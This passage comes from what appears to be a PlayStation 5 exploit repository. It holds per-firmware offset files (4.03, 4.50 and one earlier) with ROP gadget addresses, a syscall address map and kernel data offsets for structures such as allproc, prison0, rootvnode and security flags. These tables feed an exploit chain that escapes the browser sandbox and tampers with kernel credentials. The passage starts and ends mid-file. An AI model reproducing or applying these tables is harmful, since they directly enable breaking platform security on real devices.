225 | 0x1E3: 0x34F00, // sys_shm_unlink
226 | 0x1E6: 0x33740, // sys_cpuset_getid
227 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32EE0, // sys_openat
230 | 0x203: 0x34590, // sys___cap_rights_get
231 | 0x20A: 0x33FD0, // sys_pselect
232 | 0x214: 0x34090, // sys_regmgr_call
233 | 0x215: 0x33E10, // sys_jitshm_create
234 | 0x216: 0x343F0, // sys_jitshm_alias
235 | 0x217: 0x332E0, // sys_dl_get_list
236 | 0x218: 0x34130, // sys_dl_get_info
237 | 0x21A: 0x34070, // sys_evf_create
238 | 0x21B: 0x334C0, // sys_evf_delete
239 | 0x21C: 0x34410, // sys_evf_open
240 | 0x21D: 0x33FF0, // sys_evf_close
241 | 0x21E: 0x342B0, // sys_evf_wait
242 | 0x21F: 0x34A80, // sys_evf_trywait
243 | 0x220: 0x34430, // sys_evf_set
244 | 0x221: 0x349A0, // sys_evf_clear
245 | 0x222: 0x337B0, // sys_evf_cancel
246 | 0x223: 0x34290, // sys_query_memory_protection
247 | 0x224: 0x33B80, // sys_batch_map
248 | 0x225: 0x33D90, // sys_osem_create
249 | 0x226: 0x32D60, // sys_osem_delete
250 | 0x227: 0x32CE0, // sys_osem_open
251 | 0x228: 0x352E0, // sys_osem_close
252 | 0x229: 0x34370, // sys_osem_wait
253 | 0x22A: 0x34980, // sys_osem_trywait
254 | 0x22B: 0x34610, // sys_osem_post
255 | 0x22C: 0x33EF0, // sys_osem_cancel
256 | 0x22D: 0x33CA0, // sys_namedobj_create
257 | 0x22E: 0x339A0, // sys_namedobj_delete
258 | 0x22F: 0x35570, // sys_set_vm_container
259 | 0x230: 0x33460, // sys_debug_init
260 | 0x233: 0x33DD0, // sys_opmc_enable
261 | 0x234: 0x32E40, // sys_opmc_disable
262 | 0x235: 0x33E50, // sys_opmc_set_ctl
263 | 0x236: 0x33E70, // sys_opmc_set_ctr
264 | 0x237: 0x348C0, // sys_opmc_get_ctr
265 | 0x23C: 0x336E0, // sys_virtual_query
266 | 0x249: 0x34D00, // sys_is_in_sandbox
267 | 0x24A: 0x338C0, // sys_dmem_container
268 | 0x24B: 0x34170, // sys_get_authinfo
269 | 0x24C: 0x32CC0, // sys_mname
270 | 0x24F: 0x332C0, // sys_dynlib_dlsym
271 | 0x250: 0x335C0, // sys_dynlib_get_list
272 | 0x251: 0x35060, // sys_dynlib_get_info
273 | 0x252: 0x33F70, // sys_dynlib_load_prx
274 | 0x253: 0x32F60, // sys_dynlib_unload_prx
275 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
277 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32B30, // sys_sandbox_path
279 | 0x259: 0x336A0, // sys_mdbg_service
280 | 0x25A: 0x33D30, // sys_randomized_path
281 | 0x25B: 0x34BA0, // sys_rdup
282 | 0x25C: 0x331A0, // sys_dl_get_metadata
283 | 0x25D: 0x338E0, // sys_workaround8849
284 | 0x25E: 0x330A0, // sys_is_development_mode
285 | 0x25F: 0x34210, // sys_get_self_auth_info
286 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
287 | 0x262: 0x35550, // sys_budget_get_ptype
288 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x352C0, // sys_get_proc_type_info
290 | 0x265: 0x32AD0, // sys_get_resident_count
291 | 0x267: 0x33E30, // sys_get_resident_fmem_count
292 | 0x268: 0x34EE0, // sys_thr_get_name
293 | 0x269: 0x344F0, // sys_set_gpo
294 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
296 | 0x26C: 0x33100, // sys_free_stack
297 | 0x26E: 0x32D00, // sys_ipmimgr_call
298 | 0x26F: 0x34150, // sys_get_gpo
299 | 0x270: 0x35530, // sys_get_vm_map_timestamp
300 | 0x271: 0x34AE0, // sys_opmc_set_hw
301 | 0x272: 0x33620, // sys_opmc_get_hw
302 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
303 | 0x274: 0x34310, // sys_mmap_dmem
304 | 0x275: 0x336C0, // sys_physhm_open
305 | 0x276: 0x33ED0, // sys_physhm_unlink
306 | 0x278: 0x35470, // sys_thr_suspend_ucontext
307 | 0x279: 0x33960, // sys_thr_resume_ucontext
308 | 0x27A: 0x33920, // sys_thr_get_ucontext
309 | 0x27B: 0x33A20, // sys_thr_set_ucontext
310 | 0x27C: 0x33660, // sys_set_timezone_info
311 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
312 | 0x27E: 0x33760, // sys_utc_to_localtime
313 | 0x27F: 0x35590, // sys_localtime_to_utc
314 | 0x280: 0x34710, // sys_set_uevt
315 | 0x281: 0x33280, // sys_get_cpu_usage_proc
316 | 0x282: 0x33B00, // sys_get_map_statistics
317 | 0x283: 0x348A0, // sys_set_chicken_switches
318 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
319 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
320 | 0x288: 0x32D40, // sys_app_state_change
321 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32DE0, // sys_process_terminate
323 | 0x28D: 0x335A0, // sys_blockpool_open
324 | 0x28E: 0x33340, // sys_blockpool_map
325 | 0x28F: 0x34D80, // sys_blockpool_unmap
326 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x33A80, // sys_blockpool_batch
328 | 0x292: 0x331E0, // sys_fdatasync
329 | 0x293: 0x33700, // sys_dynlib_get_list2
330 | 0x294: 0x35450, // sys_dynlib_get_info2
331 | 0x295: 0x34C00, // sys_aio_submit
332 | 0x296: 0x33180, // sys_aio_multi_delete
333 | 0x297: 0x33FB0, // sys_aio_multi_wait
334 | 0x298: 0x33060, // sys_aio_multi_poll
335 | 0x299: 0x34B00, // sys_aio_get_data
336 | 0x29A: 0x33F90, // sys_aio_multi_cancel
337 | 0x29B: 0x32F40, // sys_get_bio_usage_all
338 | 0x29C: 0x34630, // sys_aio_create
339 | 0x29D: 0x350A0, // sys_aio_submit_cmd
340 | 0x29E: 0x34FA0, // sys_aio_init
341 | 0x29F: 0x34A00, // sys_get_page_table_stats
342 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x35000, // sys_blockpool_move
344 | 0x2A2: 0x34E80, // sys_virtual_query_all
345 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
346 | 0x2A4: 0x347E0, // sys_cpumode_yield
347 | 0x2A5: 0x342F0, // sys_wait6
348 | 0x2A6: 0x33D50, // sys_cap_rights_limit
349 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
350 | 0x2A8: 0x34050, // sys_cap_ioctls_get
351 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
353 | 0x2AB: 0x35320, // sys_bindat
354 | 0x2AC: 0x33B20, // sys_connectat
355 | 0x2AD: 0x32D80, // sys_chflagsat
356 | 0x2AE: 0x32BD0, // sys_accept4
357 | 0x2AF: 0x331C0, // sys_pipe2
358 | 0x2B0: 0x33BC0, // sys_aio_mlock
359 | 0x2B1: 0x352A0, // sys_procctl
360 | 0x2B2: 0x34550, // sys_ppoll
361 | 0x2B3: 0x34490, // sys_futimens
362 | 0x2B4: 0x34C40, // sys_utimensat
363 | 0x2B5: 0x341B0, // sys_numa_getaffinity
364 | 0x2B6: 0x34010, // sys_numa_setaffinity
365 | 0x2C1: 0x33020, // sys_get_phys_page_size
366 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x33860, // sys_openintr
368 | 0x2CD: 0x34350, // sys_dl_get_info_2
369 | 0x2CE: 0x33940, // sys_acinfo_add
370 | 0x2CF: 0x32BB0, // sys_acinfo_delete
371 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32E00, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x8D2F;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x318D2F;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xF18D2F;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.03.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04580;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x000156EA,
22 | "pop rcx": 0x00060DF3,
23 | "pop r8": 0x01262A4F,
24 | "pop r9" : 0x004E450C,
25 | "pop rax": 0x00084094,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118570,
29 | "mov [rdi], rax": 0x00C3A5C0,
30 | "mov [rdi], eax": 0x003FB6E6,
31 |
32 | "infloop": 0x000109E1,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00204122,
36 | "sete al" : 0x00B7B735,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B7657,
39 | "setg al" : 0x000708c9,
40 | "setl al" : 0x01517692,
41 | "shl rax, 3" : 0x01A43F03,
42 | "add rax, rdx" : 0x016F4948,
43 | "mov rax, [rax]" : 0x0142E309,
44 | "inc dword [rax]": 0x017629AF,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x34230, // sys_exit
49 | 0x002: 0x351E0, // sys_fork
50 | 0x003: 0x33400, // sys_read
51 | 0x004: 0x33360, // sys_write
52 | 0x005: 0x33A00, // sys_open
53 | 0x006: 0x34030, // sys_close
54 | 0x007: 0x32C20, // sys_wait4
55 | 0x00A: 0x34D20, // sys_unlink
56 | 0x00C: 0x346B0, // sys_chdir
57 | 0x00F: 0x340B0, // sys_chmod
58 | 0x014: 0x33580, // sys_getpid
59 | 0x017: 0x33080, // sys_setuid
60 | 0x018: 0x34690, // sys_getuid
61 | 0x019: 0x33A40, // sys_geteuid
62 | 0x01B: 0x33AE0, // sys_recvmsg
63 | 0x01C: 0x33D10, // sys_sendmsg
64 | 0x01D: 0x34860, // sys_recvfrom
65 | 0x01E: 0x32F80, // sys_accept
66 | 0x01F: 0x32DA0, // sys_getpeername
67 | 0x020: 0x34EC0, // sys_getsockname
68 | 0x021: 0x349E0, // sys_access
69 | 0x022: 0x34B60, // sys_chflags
70 | 0x023: 0x34530, // sys_fchflags
71 | 0x024: 0x35410, // sys_sync
72 | 0x025: 0x339E0, // sys_kill
73 | 0x027: 0x33480, // sys_getppid
74 | 0x029: 0x34A40, // sys_dup
75 | 0x02A: 0x333D0, // sys_pipe
76 | 0x02B: 0x35080, // sys_getegid
77 | 0x02C: 0x353D0, // sys_profil
78 | 0x02F: 0x32F20, // sys_getgid
79 | 0x031: 0x32F00, // sys_getlogin
80 | 0x032: 0x34790, // sys_setlogin
81 | 0x035: 0x33140, // sys_sigaltstack
82 | 0x036: 0x332A0, // sys_ioctl
83 | 0x037: 0x34570, // sys_reboot
84 | 0x038: 0x34470, // sys_revoke
85 | 0x03B: 0x34770, // sys_execve
86 | 0x041: 0x34110, // sys_msync
87 | 0x049: 0x33900, // sys_munmap
88 | 0x04A: 0x34670, // sys_mprotect
89 | 0x04B: 0x337F0, // sys_madvise
90 | 0x04E: 0x339C0, // sys_mincore
91 | 0x04F: 0x32E80, // sys_getgroups
92 | 0x050: 0x33420, // sys_setgroups
93 | 0x053: 0x32E60, // sys_setitimer
94 | 0x056: 0x32C80, // sys_getitimer
95 | 0x059: 0x344D0, // sys_getdtablesize
96 | 0x05A: 0x348E0, // sys_dup2
97 | 0x05C: 0x33F10, // sys_fcntl
98 | 0x05D: 0x33A60, // sys_select
99 | 0x05F: 0x32EC0, // sys_fsync
100 | 0x060: 0x33DF0, // sys_setpriority
101 | 0x061: 0x33640, // sys_socket
102 | 0x062: 0x346D0, // sys_connect
103 | 0x063: 0x35040, // sys_netcontrol
104 | 0x064: 0x32C40, // sys_getpriority
105 | 0x065: 0x34C60, // sys_netabort
106 | 0x066: 0x34FE0, // sys_netgetsockinfo
107 | 0x068: 0x34CE0, // sys_bind
108 | 0x069: 0x33F50, // sys_setsockopt
109 | 0x06A: 0x33240, // sys_listen
110 | 0x071: 0x34250, // sys_socketex
111 | 0x072: 0x33C20, // sys_socketclose
112 | 0x074: 0x353F0, // sys_gettimeofday
113 | 0x075: 0x354D0, // sys_getrusage
114 | 0x076: 0x32C00, // sys_getsockopt
115 | 0x078: 0x33E90, // sys_readv
116 | 0x079: 0x33CF0, // sys_writev
117 | 0x07A: 0x34940, // sys_settimeofday
118 | 0x07C: 0x33880, // sys_fchmod
119 | 0x07D: 0x340F0, // sys_netgetiflist
120 | 0x07E: 0x34FC0, // sys_setreuid
121 | 0x07F: 0x33BE0, // sys_setregid
122 | 0x080: 0x34B40, // sys_rename
123 | 0x083: 0x33B60, // sys_flock
124 | 0x085: 0x35430, // sys_sendto
125 | 0x086: 0x35260, // sys_shutdown
126 | 0x087: 0x345F0, // sys_socketpair
127 | 0x088: 0x34390, // sys_mkdir
128 | 0x089: 0x335E0, // sys_rmdir
129 | 0x08A: 0x32AF0, // sys_utimes
130 | 0x08C: 0x34F80, // sys_adjtime
131 | 0x08D: 0x340D0, // sys_kqueueex
132 | 0x093: 0x34330, // sys_setsid
133 | 0x0A5: 0x32E20, // sys_sysarch
134 | 0x0B6: 0x34DC0, // sys_setegid
135 | 0x0B7: 0x32C60, // sys_seteuid
136 | 0x0BC: 0x34E20, // sys_stat
137 | 0x0BD: 0x35220, // sys_fstat
138 | 0x0BE: 0x33C00, // sys_lstat
139 | 0x0BF: 0x33300, // sys_pathconf
140 | 0x0C0: 0x345B0, // sys_fpathconf
141 | 0x0C2: 0x33B40, // sys_getrlimit
142 | 0x0C3: 0x33720, // sys_setrlimit
143 | 0x0C4: 0x34D40, // sys_getdirentries
144 | 0x0CA: 0x34B20, // sys___sysctl
145 | 0x0CB: 0x341D0, // sys_mlock
146 | 0x0CC: 0x34BC0, // sys_munlock
147 | 0x0CE: 0x33680, // sys_futimes
148 | 0x0D1: 0x33C60, // sys_poll
149 | 0x0E8: 0x32D20, // sys_clock_gettime
150 | 0x0E9: 0x34190, // sys_clock_settime
151 | 0x0EA: 0x35190, // sys_clock_getres
152 | 0x0EB: 0x34D60, // sys_ktimer_create
153 | 0x0EC: 0x334E0, // sys_ktimer_delete
154 | 0x0ED: 0x35240, // sys_ktimer_settime
155 | 0x0EE: 0x346F0, // sys_ktimer_gettime
156 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34C20, // sys_nanosleep
158 | 0x0F1: 0x34450, // sys_ffclock_getcounter
159 | 0x0F2: 0x33440, // sys_ffclock_setestimate
160 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
161 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x34880, // sys_issetugid
163 | 0x110: 0x35020, // sys_getdents
164 | 0x121: 0x34730, // sys_preadv
165 | 0x122: 0x33C80, // sys_pwritev
166 | 0x136: 0x33980, // sys_getsid
167 | 0x13B: 0x34E40, // sys_aio_suspend
168 | 0x144: 0x33500, // sys_mlockall
169 | 0x145: 0x34900, // sys_munlockall
170 | 0x147: 0x33600, // sys_sched_setparam
171 | 0x148: 0x34270, // sys_sched_getparam
172 | 0x149: 0x32DC0, // sys_sched_setscheduler
173 | 0x14A: 0x33C40, // sys_sched_getscheduler
174 | 0x14B: 0x33AA0, // sys_sched_yield
175 | 0x14C: 0x33040, // sys_sched_get_priority_max
176 | 0x14D: 0x33160, // sys_sched_get_priority_min
177 | 0x14E: 0x33390, // sys_sched_rr_get_interval
178 | 0x154: 0x32B50, // sys_sigprocmask
179 | 0x155: 0x32B90, // sys_sigsuspend
180 | 0x157: 0x34A60, // sys_sigpending
181 | 0x159: 0x34B80, // sys_sigtimedwait
182 | 0x15A: 0x347C0, // sys_sigwaitinfo
183 | 0x16A: 0x34DA0, // sys_kqueue
184 | 0x16B: 0x33000, // sys_kevent
185 | 0x17B: 0x32FA0, // sys_mtypeprotect
186 | 0x188: 0x330C0, // sys_uuidgen
187 | 0x189: 0x35510, // sys_sendfile
188 | 0x18D: 0x33560, // sys_fstatfs
189 | 0x190: 0x33120, // sys_ksem_close
190 | 0x191: 0x33EB0, // sys_ksem_post
191 | 0x192: 0x34750, // sys_ksem_wait
192 | 0x193: 0x354F0, // sys_ksem_trywait
193 | 0x194: 0x33260, // sys_ksem_init
194 | 0x195: 0x34C80, // sys_ksem_open
195 | 0x196: 0x34960, // sys_ksem_unlink
196 | 0x197: 0x330E0, // sys_ksem_getvalue
197 | 0x198: 0x34920, // sys_ksem_destroy
198 | 0x1A0: 0x34E00, // sys_sigaction
199 | 0x1A1: 0x34AA0, // sys_sigreturn
200 | 0x1A5: 0x33780, // sys_getcontext
201 | 0x1A6: 0x344B0, // sys_setcontext
202 | 0x1A7: 0x345D0, // sys_swapcontext
203 | 0x1AD: 0x337D0, // sys_sigwait
204 | 0x1AE: 0x32EA0, // sys_thr_create
205 | 0x1AF: 0x33200, // sys_thr_exit
206 | 0x1B0: 0x33BA0, // sys_thr_self
207 | 0x1B1: 0x33220, // sys_thr_kill
208 | 0x1B9: 0x34840, // sys_ksem_timedwait
209 | 0x1BA: 0x32B70, // sys_thr_suspend
210 | 0x1BB: 0x334A0, // sys_thr_wake
211 | 0x1BC: 0x34510, // sys_kldunloadf
212 | 0x1C6: 0x35200, // sys__umtx_op
213 | 0x1C7: 0x34F40, // sys_thr_new
214 | 0x1C8: 0x34EA0, // sys_sigqueue
215 | 0x1D0: 0x34800, // sys_thr_set_name
216 | 0x1D2: 0x33DB0, // sys_rtprio_thread
217 | 0x1DB: 0x33540, // sys_pread
218 | 0x1DC: 0x34650, // sys_pwrite
219 | 0x1DD: 0x34F20, // sys_mmap
220 | 0x1DE: 0x34A20, // sys_lseek
221 | 0x1DF: 0x33AC0, // sys_truncate
222 | 0x1E0: 0x33520, // sys_ftruncate
223 | 0x1E1: 0x32B10, // sys_thr_kill2
224 | 0x1E2: 0x35490, // sys_shm_open
225 | 0x1E3: 0x34F00, // sys_shm_unlink
226 | 0x1E6: 0x33740, // sys_cpuset_getid
227 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32EE0, // sys_openat
230 | 0x203: 0x34590, // sys___cap_rights_get
231 | 0x20A: 0x33FD0, // sys_pselect
232 | 0x214: 0x34090, // sys_regmgr_call
233 | 0x215: 0x33E10, // sys_jitshm_create
234 | 0x216: 0x343F0, // sys_jitshm_alias
235 | 0x217: 0x332E0, // sys_dl_get_list
236 | 0x218: 0x34130, // sys_dl_get_info
237 | 0x21A: 0x34070, // sys_evf_create
238 | 0x21B: 0x334C0, // sys_evf_delete
239 | 0x21C: 0x34410, // sys_evf_open
240 | 0x21D: 0x33FF0, // sys_evf_close
241 | 0x21E: 0x342B0, // sys_evf_wait
242 | 0x21F: 0x34A80, // sys_evf_trywait
243 | 0x220: 0x34430, // sys_evf_set
244 | 0x221: 0x349A0, // sys_evf_clear
245 | 0x222: 0x337B0, // sys_evf_cancel
246 | 0x223: 0x34290, // sys_query_memory_protection
247 | 0x224: 0x33B80, // sys_batch_map
248 | 0x225: 0x33D90, // sys_osem_create
249 | 0x226: 0x32D60, // sys_osem_delete
250 | 0x227: 0x32CE0, // sys_osem_open
251 | 0x228: 0x352E0, // sys_osem_close
252 | 0x229: 0x34370, // sys_osem_wait
253 | 0x22A: 0x34980, // sys_osem_trywait
254 | 0x22B: 0x34610, // sys_osem_post
255 | 0x22C: 0x33EF0, // sys_osem_cancel
256 | 0x22D: 0x33CA0, // sys_namedobj_create
257 | 0x22E: 0x339A0, // sys_namedobj_delete
258 | 0x22F: 0x35570, // sys_set_vm_container
259 | 0x230: 0x33460, // sys_debug_init
260 | 0x233: 0x33DD0, // sys_opmc_enable
261 | 0x234: 0x32E40, // sys_opmc_disable
262 | 0x235: 0x33E50, // sys_opmc_set_ctl
263 | 0x236: 0x33E70, // sys_opmc_set_ctr
264 | 0x237: 0x348C0, // sys_opmc_get_ctr
265 | 0x23C: 0x336E0, // sys_virtual_query
266 | 0x249: 0x34D00, // sys_is_in_sandbox
267 | 0x24A: 0x338C0, // sys_dmem_container
268 | 0x24B: 0x34170, // sys_get_authinfo
269 | 0x24C: 0x32CC0, // sys_mname
270 | 0x24F: 0x332C0, // sys_dynlib_dlsym
271 | 0x250: 0x335C0, // sys_dynlib_get_list
272 | 0x251: 0x35060, // sys_dynlib_get_info
273 | 0x252: 0x33F70, // sys_dynlib_load_prx
274 | 0x253: 0x32F60, // sys_dynlib_unload_prx
275 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
277 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32B30, // sys_sandbox_path
279 | 0x259: 0x336A0, // sys_mdbg_service
280 | 0x25A: 0x33D30, // sys_randomized_path
281 | 0x25B: 0x34BA0, // sys_rdup
282 | 0x25C: 0x331A0, // sys_dl_get_metadata
283 | 0x25D: 0x338E0, // sys_workaround8849
284 | 0x25E: 0x330A0, // sys_is_development_mode
285 | 0x25F: 0x34210, // sys_get_self_auth_info
286 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
287 | 0x262: 0x35550, // sys_budget_get_ptype
288 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x352C0, // sys_get_proc_type_info
290 | 0x265: 0x32AD0, // sys_get_resident_count
291 | 0x267: 0x33E30, // sys_get_resident_fmem_count
292 | 0x268: 0x34EE0, // sys_thr_get_name
293 | 0x269: 0x344F0, // sys_set_gpo
294 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
296 | 0x26C: 0x33100, // sys_free_stack
297 | 0x26E: 0x32D00, // sys_ipmimgr_call
298 | 0x26F: 0x34150, // sys_get_gpo
299 | 0x270: 0x35530, // sys_get_vm_map_timestamp
300 | 0x271: 0x34AE0, // sys_opmc_set_hw
301 | 0x272: 0x33620, // sys_opmc_get_hw
302 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
303 | 0x274: 0x34310, // sys_mmap_dmem
304 | 0x275: 0x336C0, // sys_physhm_open
305 | 0x276: 0x33ED0, // sys_physhm_unlink
306 | 0x278: 0x35470, // sys_thr_suspend_ucontext
307 | 0x279: 0x33960, // sys_thr_resume_ucontext
308 | 0x27A: 0x33920, // sys_thr_get_ucontext
309 | 0x27B: 0x33A20, // sys_thr_set_ucontext
310 | 0x27C: 0x33660, // sys_set_timezone_info
311 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
312 | 0x27E: 0x33760, // sys_utc_to_localtime
313 | 0x27F: 0x35590, // sys_localtime_to_utc
314 | 0x280: 0x34710, // sys_set_uevt
315 | 0x281: 0x33280, // sys_get_cpu_usage_proc
316 | 0x282: 0x33B00, // sys_get_map_statistics
317 | 0x283: 0x348A0, // sys_set_chicken_switches
318 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
319 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
320 | 0x288: 0x32D40, // sys_app_state_change
321 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32DE0, // sys_process_terminate
323 | 0x28D: 0x335A0, // sys_blockpool_open
324 | 0x28E: 0x33340, // sys_blockpool_map
325 | 0x28F: 0x34D80, // sys_blockpool_unmap
326 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x33A80, // sys_blockpool_batch
328 | 0x292: 0x331E0, // sys_fdatasync
329 | 0x293: 0x33700, // sys_dynlib_get_list2
330 | 0x294: 0x35450, // sys_dynlib_get_info2
331 | 0x295: 0x34C00, // sys_aio_submit
332 | 0x296: 0x33180, // sys_aio_multi_delete
333 | 0x297: 0x33FB0, // sys_aio_multi_wait
334 | 0x298: 0x33060, // sys_aio_multi_poll
335 | 0x299: 0x34B00, // sys_aio_get_data
336 | 0x29A: 0x33F90, // sys_aio_multi_cancel
337 | 0x29B: 0x32F40, // sys_get_bio_usage_all
338 | 0x29C: 0x34630, // sys_aio_create
339 | 0x29D: 0x350A0, // sys_aio_submit_cmd
340 | 0x29E: 0x34FA0, // sys_aio_init
341 | 0x29F: 0x34A00, // sys_get_page_table_stats
342 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x35000, // sys_blockpool_move
344 | 0x2A2: 0x34E80, // sys_virtual_query_all
345 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
346 | 0x2A4: 0x347E0, // sys_cpumode_yield
347 | 0x2A5: 0x342F0, // sys_wait6
348 | 0x2A6: 0x33D50, // sys_cap_rights_limit
349 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
350 | 0x2A8: 0x34050, // sys_cap_ioctls_get
351 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
353 | 0x2AB: 0x35320, // sys_bindat
354 | 0x2AC: 0x33B20, // sys_connectat
355 | 0x2AD: 0x32D80, // sys_chflagsat
356 | 0x2AE: 0x32BD0, // sys_accept4
357 | 0x2AF: 0x331C0, // sys_pipe2
358 | 0x2B0: 0x33BC0, // sys_aio_mlock
359 | 0x2B1: 0x352A0, // sys_procctl
360 | 0x2B2: 0x34550, // sys_ppoll
361 | 0x2B3: 0x34490, // sys_futimens
362 | 0x2B4: 0x34C40, // sys_utimensat
363 | 0x2B5: 0x341B0, // sys_numa_getaffinity
364 | 0x2B6: 0x34010, // sys_numa_setaffinity
365 | 0x2C1: 0x33020, // sys_get_phys_page_size
366 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x33860, // sys_openintr
368 | 0x2CD: 0x34350, // sys_dl_get_info_2
369 | 0x2CE: 0x33940, // sys_acinfo_add
370 | 0x2CF: 0x32BB0, // sys_acinfo_delete
371 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32E00, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x8AD3;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x318AD3;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xF18AD3;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.50.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04580;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
